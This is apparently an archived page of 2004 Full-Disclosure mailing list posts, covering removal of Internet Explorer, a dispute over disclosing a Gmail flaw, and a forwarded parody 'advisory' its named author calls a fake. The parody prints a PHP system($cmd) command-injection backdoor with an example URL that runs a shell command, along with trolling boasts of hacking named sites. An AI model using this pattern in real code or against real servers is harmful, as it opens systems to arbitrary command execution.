I'm lazy, too lazy to just filter you out. Stop posting garbage,
garbage! ;/

--
Henrik Persson

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
                
---------------------------------
Do you Yahoo!?
Read only the mail you want - Yahoo! Mail SpamGuard.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] IE Web Browser: "Sitting Duck"

From: Barry Fitzgerald (bkfsecsdf.lonestar.org)
Date: Tue Jul 06 2004 - 11:38:18 CDT

Frank Knobbe wrote:

>On Tue, 2004-07-06 at 09:27, Barry Fitzgerald wrote:
>
>
>>Is it impossible to remove easily and difficult to remove cleanly? Yes...
>>
>>
>
>Heh... I just noticed (by chance) that there is an option in |Control
>Panel -> Add/Remove Programs -> Windows Components| to remove Internet
>Explorer (which supposedly "Adds or removes access to Internet Explorer
>from the Start menu and Desktop").
>
>I never thought I see the say where MS makes the removal (or at least
>hiding) of IE an option :)
>
>Cheers,
>Frank
>
>
>

Does it work now?

It's always been there to my knowledge, but in the past it's never
actually removed it - just reverted to the prior version.

Which version of Windows are you looking at?

             -Barry

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] IE Web Browser: "Sitting Duck"

From: Frank Knobbe (frankknobbe.us)
Date: Tue Jul 06 2004 - 11:32:35 CDT

On Tue, 2004-07-06 at 09:27, Barry Fitzgerald wrote:
> Is it impossible to remove easily and difficult to remove cleanly? Yes...

Heh... I just noticed (by chance) that there is an option in |Control
Panel -> Add/Remove Programs -> Windows Components| to remove Internet
Explorer (which supposedly "Adds or removes access to Internet Explorer
from the Start menu and Desktop").

I never thought I see the say where MS makes the removal (or at least
hiding) of IE an option :)

Cheers,
Frank

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (FreeBSD)

iD8DBQBA6tQiJjGc5ftAw8wRAvJIAJ94+iL43rR1hHH7y+bs7RRH/bYtwgCg/rWI
HBqo3fuX+l2h/u+PkOoI9BQ=
=jx6p
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] IE Web Browser: "Sitting Duck"

From: Frank Knobbe (frankknobbe.us)
Date: Tue Jul 06 2004 - 11:47:12 CDT

On Tue, 2004-07-06 at 11:38, Barry Fitzgerald wrote:
> Does it work now?

Haven't tried as I (unfortunately) need IE on that box.

> It's always been there to my knowledge, but in the past it's never
> actually removed it - just reverted to the prior version.
>
> Which version of Windows are you looking at?

Windows 2000 SP4. I had not noticed the addition of that option (and
Outlook Express) to the Windows Components Add/Remove list. I don't use
Windows anymore except this one box for occasions where Windows (or IE)
is required.

Perhaps I should take some time to check out all those new *features*
and *services* that simple *patches* add to the system. :)

Regards,
Frank

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (FreeBSD)

iD8DBQBA6teQJjGc5ftAw8wRAlC0AJ9AjSHctqngfysEfwib8pr1JUFqugCfeXq2
Tzm4ChM3pAUatXT87Qw9N84=
=fPZS
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Fw: [Full-Disclosure] ANOTHER 3L33T3 ADVISO AND NOT ON PHP-CASTOR 10.3 BETA (used by 3 peoples on internet) !!! 0DAY EXPLOIT !

From: Frog Man (leseulfroghotmail.com)
Date: Tue Jul 06 2004 - 11:39:52 CDT

This "advisory" was of course not written by me, it's a fake.

Bye

Germain Randaxhe aka frog-mn

>----- Original Message -----
>From: <frogmanno-log.org>
>To: <full-disclosurelists.netsys.com>
>Sent: Monday, July 05, 2004 9:20 PM
>Subject: [Full-Disclosure] ANOTHER 3L33T3 ADVISO AND NOT ON PHP-CASTOR 10.3
>BETA (used by 3 peoples on internet) !!! 0DAY EXPLOIT !
>
>
> > This is IHCTEAM material. We fuck blackhats and we own the planet. This
>is
> > a leet advisory, s0 l33t. Just read it and be quiet.
> >
> > ---------------------------
> >
> > IHC TEAM private work, all the fame become to IHC TEAM and the leetest
>mr.
> > Frog-mn !!!!
> >
> > Product: PHP
> > Version: all
> > Security level: Very high baby !!!
> >
> >
> > What's the problem ?
> > ==================
> >
> > There is a BIG 1337 BUG 0day in all the php versions for ever never.
>This
> > bug is caused by
> > the system() function. This is a very VERY 3v1l backdoor, that allows
> > execution of
> > arbitrary shell command. This backdoor has been coded by ZyXyS from
>HACK3R
> > c0rp0r4ti0n (c) (TM) (R).
> >
> > Because we want fame, we'll explain you da bug:
> > l00k at th1s 3v1l code:
> >
> > <?
> > system("$cmd");
> > ?>
> >
> > *TADAAAA* !
> >
> >
> > If this code is on a webserver, a malicious user (like ZyXyS) can exec
> > EVERYTHING and own EVERYWHERE.
> > Example:
> > www.thc-is-lame.org/page.php?cmd=ls%20/tmp
> >
> > It will give you:
> >
> > tmp-shells-owned-with-THC-Hydra-fucking-lame-kiddy-tool.txt
> > adore.tar.gz
> > last-10-leaked-exploits.tar.gz
> >
> >
> > You see, you can rock.
> > So, at this point we can see that ZyXyS is a very leet guy: THIS
>BACKDOOR
> > is less detectable than
> > a LKM BACKDOOR like adore.tar.gz (<--- hahaha).
> >
> > I release this vulnerability because the K-otik team (www.k-otik.com)
> > owned ZyXyS 10 days ago
> > (after the fbi) and discovered the backdoor, and k-otik wanted to write
>an
> > advisory, ONLY FOR FAME
> > AND MONEY. I want this fame (but for the money, I don't mind, I am rich
> > because I sell 0day,
> > traded on #darknet, to idefense), so I had to release the bug before
>K-otik.
> > k-otik is like hack.co.za, they release everything and nothing, but they
> > can't code their own exploit.
> >
> >
> > Greets:
> > ======
> >
> > Rudolf Polzer (divzerogmail.com): Thank to his idea to disclose this
>bug
> > and if you have another idea
> > for us mail me
> > packetstormsecurity: they give us kiddie-friendly exploits and mass
>rooters
> > spender: he sells good security patches
> > isec: now my grandmother can r00t linux boxes
> > bugtraq: they leak bugs found by ugly blackhats, which worked a lot of
> > time to discover them
> > espionet guys: they represented very well the hacker scene in a TV show
> > with their netbus
> > (please don't open my cdrom device guys)
> >
> >
> > Fame:
> > ====
> >
> >
> > We already owned everyone and everything with these exploits years ago,
> > and in
> > fact we've all had them sitting on the shelf gathering dust due to lack
>of
> > new targets.
> >
> > FUN TESTED IDEAS:
> >
> > www.team-teso.net (down because of us)
> > www.thc.org (haha owned 10 times)
> > www.securityfocus.com
> >
> >
> > It was very funny to read .gov and .mil files.
> >
> > WARNING !!!
> >
> > /!\ WE ARE LOOKING FOR A JOB IN THE SECURITY RESEARCH /!\
> >
> > Visit us:
> >
> > www.ihcteam.com
> > www.newffr.com
> > www.espionet.net
> > www.underground-fr.org
> > www.phpsecure.com
> >
> >
> > ---------------------------
> >
> > We n33d f4me, m0n3y, g1rls and m0nk3ys, so VIVA EL DISCLOSURO.
> >
> > ---- fr0g-mn ----
> >

_________________________________________________________________
A la recherche d'un taux plus intéressant? http://money.fr.msn.be/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: Rodrigo Gutierrez (rodrigointellicomp.cl)
Date: Tue Jul 06 2004 - 13:24:30 CDT

Full as in "full" means FULL, the very purpose of this list is to allow
people posting their findings without being moderated by people like you.

 

PS: do not disrespect M$, keep your advisories private bitches!

 

Regards

 

Rodrigo.-

  _____

De: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] En nombre de System Outage
Enviado el: Lunes, 05 de Julio de 2004 12:00
Para: full-disclosurelists.netsys.com
Asunto: Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

If it's about posting advisories, why do many decide to post the exploit
along with the advisory. To me this is not a responsible thing to do.
Whoever knows how many script kiddies are sleeping on this list and taking
advantage of the free exploit giveaway's seen here.
 
10 days isn't an awful long time and the vendor never made primary contact
with the user in question. Meaning, for whatever reason the e-mail may not
have been delivered and because of this the Gmail Team could easily of been
caught short on this issue and a serious hole exposed to the public, before
the vendor (Gmail) has had a chance to scramble together an incident
response and get the hole patched out, before a serious number of account's
become compromised on the service.
 
There is a difference between responsible "Full Disclosure" and
irresponsible "Full Disclosure".
 
 
Cheerio
 
 

Tremaine <tremainegmail.com> wrote:

It's about posting security advisories. The initial poster advises
they notified the gmail team, and posted this advisory 10 days later.

It is immaterial whether an application is in alpha, beta or
production. If the software or application is in use outside the
development team, and there is a security issue, it is relevant to
this list.

It's called Full Disclosure for a reason... not partial disclosure,
not disclosure of production applications only... Full Disclosure.

If you want partial disclosure, you may need to rethink your
subscription to the list.

--
Tremaine
IT Security Consultant

----- Original Message -----
From: System Outage
Date: Mon, 5 Jul 2004 06:46:42 -0700 (PDT)
Subject: Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
To: full-disclosurelists.netsys.com

If it's not about respect then what is it about?

You have no respect for the Gmail Team, that's for sure.

I guess this list isn't about respect...

It's about kiddies posting advisories and exploits for fun and little
care for the vendor(s).

Cheerio

amforwardmailsurf.com wrote:
System Outage wrote:

|The correct channel to post such "bugs" is the Gmail contact link for "bug
|reports".

I have already contacted Gmail about 10 days ago, but I have not received
any
replies till this moment.

|If you had waited until the Gmail dev team declared gmail a public release,

|you would have gained more respect in the security community scene.

I don't think this is about respect afterall.

Regards,
Ahmed Motaz

------------------------------------------------------
Mailsurf.com your communication portal for SMS,
Email, Fax, E-C! ards and more. www.mailsurf.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

________________________________
Do you Yahoo!?
Yahoo! Mail - Helps protect you from nasty viruses.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] IE Web Browser: 'Sitting Duck'

From: Eric Paynter (ericarcticbears.com)
Date: Tue Jul 06 2004 - 14:32:41 CDT

On Tue, July 6, 2004 9:38 am, Barry Fitzgerald said:
> Frank Knobbe wrote:
>>Heh... I just noticed (by chance) that there is an option in |Control
>>Panel -> Add/Remove Programs -> Windows Components| to remove Internet
>>Explorer (which supposedly "Adds or removes access to Internet Explorer
>>from the Start menu and Desktop").
>
> Does it work now?

It might remove the icons so you cannot launch it, but since the desktop
is a thread of IE, it can't possibly remove the browser from the system.

-Eric

--
arctic bears - affordable email and name services yourdomain.com
http://www.arcticbears.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Msg reply

From: Rms (rmstelekom.yu)
Date: Tue Jul 06 2004 - 16:56:32 CDT